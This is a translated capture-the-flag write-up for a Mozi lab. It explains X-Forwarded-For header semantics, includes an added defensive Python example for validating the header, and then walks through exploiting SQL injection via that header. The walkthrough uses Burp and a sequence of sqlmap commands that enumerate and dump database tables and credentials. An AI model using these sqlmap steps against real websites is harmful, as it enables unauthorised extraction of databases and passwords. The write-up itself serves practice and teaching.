Mozi - X-Forwarded-For injection vulnerability, hands-on

X-FORWARDED-FOR

First, X-Forwarded-For is an HTTP extension header. It is not defined by HTTP/1.1 (RFC 2616); it was introduced by the Squid caching proxy software to carry the real IP of the HTTP requester. Today it has become a de facto standard, widely supported by HTTP proxies, load balancers and forwarding services, and the mechanism has been written into the RFC 7239 (Forwarded HTTP Extension) standard.

The XFF value consists of several parts separated by a comma and a space. The first entry is the IP of the device furthest from the server (the original client); after it comes the IP of each proxy device the request passed through, in order.

If a request passes through three proxies Proxy1, Proxy2 and Proxy3 (with IPs IP1, IP2 and IP3 respectively) before it reaches the HTTP server, and the user's real IP is IP0, then according to the XFF convention the server will finally receive the following header:

X-Forwarded-For: IP0, IP1, IP2

Proxy3 connects directly to the server, so it appends IP2 to XFF, indicating that it is forwarding the request on behalf of Proxy2. IP3 does not appear in the list; the server obtains it from the Remote Address. HTTP runs over a TCP connection and the HTTP protocol itself has no concept of an IP address: the Remote Address comes from the TCP connection and identifies the device that established that TCP connection to the server, in this case IP3.

The Remote Address cannot be forged, because the TCP connection carrying the HTTP request requires a three-way handshake; with a spoofed source IP the TCP connection is never established and nothing further happens. Different languages obtain the Remote Address in different ways; in PHP, for example, it is $_SERVER["REMOTE_ADDR"].
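The challenge below works because the backend takes the X-Forwarded-For value as-is and uses it in a database query. As an added example (not code from the original writeup), here is how a server should consume the header described above: only look at XFF when the TCP peer is one of our own proxies, walk the list right to left past the proxies we trust, reject anything that is not a literal IP address, and write the result with a bound parameter. Proxy addresses, table and column names are constructed for the example.

```python
import ipaddress
import sqlite3

# Reverse proxies we operate, so their XFF entries can be trusted.
# Constructed example addresses, not taken from the original writeup.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2"),
                   ipaddress.ip_address("10.0.0.3")}


def parse_xff(header):
    """Split X-Forwarded-For into validated IP objects.

    Entries are comma-separated (RFC 7239 tolerates optional whitespace).
    ipaddress.ip_address() raises ValueError for anything that is not a
    literal IP, so payloads such as `*` or `' OR 1=1 --` never get past here.
    """
    if not header:
        return []
    return [ipaddress.ip_address(p.strip()) for p in header.split(",") if p.strip()]


def client_ip(remote_addr, xff_header):
    """Decide which address to treat as the client.

    remote_addr comes from the TCP connection and cannot be spoofed. Only if
    the peer is one of our own proxies do we look at XFF at all; then we walk
    the list right to left, skipping our proxies, and the first hop we do not
    own is the effective client (IP2 in the article's example if only Proxy3
    is ours; IP0 if all three are).
    """
    remote = ipaddress.ip_address(remote_addr)
    if remote not in TRUSTED_PROXIES:
        return remote                      # XFF is caller-controlled: ignore
    try:
        hops = parse_xff(xff_header)
    except ValueError:
        return remote                      # malformed header: trust TCP only
    for hop in reversed(hops):
        if hop not in TRUSTED_PROXIES:
            return hop
    return remote


def log_login_attempt(username, remote_addr, xff_header):
    """Record the attempt with a bound parameter; the ip column only ever
    receives str() of a validated address, never raw header text."""
    conn = sqlite3.connect(":memory:")     # stand-in for the real database
    conn.execute("CREATE TABLE login_log (username TEXT, ip TEXT)")
    ip = str(client_ip(remote_addr, xff_header))
    conn.execute("INSERT INTO login_log VALUES (?, ?)", (username, ip))
    return conn.execute("SELECT ip FROM login_log").fetchone()[0]
```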


On entering the site there is only a login screen; logging in with any username and password pops up an error that displays the visiting IP.

Capturing the request with Burp showed no X-Forwarded-For header; since the challenge title mentions X-Forwarded-For, add it and test.


The echoed text shows the IP address, so we guess the backend reads its data from x-forwarded-for.


Change the value of x-forwarded-for to * and save the request as 12.txt in the sqlmap directory.


Inject with sqlmap.

Dump the databases:

python sqlmap.py -r 12.txt --dbs --batch


Dump the table names:

python sqlmap.py -r 12.txt -D <database> --tables --batch


Dump the column names:

python sqlmap.py -r 12.txt -D <database> -T <table> --columns --batch


Dump the data:

python sqlmap.py -r 12.txt -D <database> -T <table> -C <col1,col2,col3> --dump --batch


With the account and password obtained, log in successfully and get the key.


Note: when dumping table names, the s after --table is mandatory; without it sqlmap reports an error.

When dumping data, wrapping the column names after dump in single quotes causes an error.


Detailed sqlmap command reference: https://www.cnblogs.com/ichunqiu/p/5805108.html

Origin www.cnblogs.com/piqiu/p/12073507.html